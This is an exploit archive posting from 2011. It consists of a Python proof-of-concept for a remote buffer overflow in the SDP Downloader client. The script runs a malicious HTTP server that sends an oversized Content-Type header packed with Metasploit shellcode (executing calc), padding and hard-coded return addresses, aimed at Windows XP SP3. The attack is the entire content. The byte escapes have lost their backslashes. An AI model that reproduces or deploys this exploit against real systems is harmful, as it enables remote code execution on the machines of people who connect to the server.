SDP Downloader Buffer Overflow
Posted on 01 February 2011
#!/usr/bin/python #Bug : SDP Downloader (http_response) Remote Buffer Overflow Exploit # by: sup3r #Tested on : Xp sp3 #http://sdp.ppona.com/ from socket import * # win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode=( "x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x71" "xf3x2ax67x83xebxfcxe2xf4x8dx1bx6ex67x71xf3xa1x22" "x4dx78x56x62x09xf2xc5xecx3exebxa1x38x51xf2xc1x2e" "xfaxc7xa1x66x9fxc2xeaxfexddx77xeax13x76x32xe0x6a" "x70x31xc1x93x4axa7x0ex63x04x16xa1x38x55xf2xc1x01" "xfaxffx61xecx2exefx2bx8cxfaxefxa1x66x9ax7ax76x43" "x75x30x1bxa7x15x78x6ax57xf4x33x52x6bxfaxb3x26xec" "x01xefx87xecx19xfbxc1x6exfax73x9ax67x71xf3xa1x0f" "x4dxacx1bx91x11xa5xa3x9fxf2x33x51x37x19x8dxf2x85" "x02x9bxb2x99xfbxfdx7dx98x96x90x4bx0bx12xf3x2ax67") buffer = 'x41'*4 buffer += shellcode buffer += 'x41'*(65584-len(shellcode)) buffer += 'xF0xF1xABx00' #00ABF1F0(shellcode address) buffer += 'x41'*36 buffer += 'xBCxEBx12x00' #0012EBBC Stack section (writable) buffer += 'x43'*9000 header=( "HTTP/1.1 200 OK " "Content-Type: video/"+buffer+" " "Last-Modified: 20 Mar 2010 09:50:10 GMT " "Accept-Ranges: bytes " "ETag: "075a1fc3d4dc41:0" " "Server: Microsoft-IIS/7.5 " "X-Powered-By: ASP.NET " "Date: Sat, 20 Mar 2010 14:31:46 GMT " "Connection: close " "Content-Length: 324 ") s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 80)) s.listen(1) print "[+] Listening on [HTTP] 80" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(header) c.send(header) raw_input("[+] Done, press enter to quit") c.close() s.close()
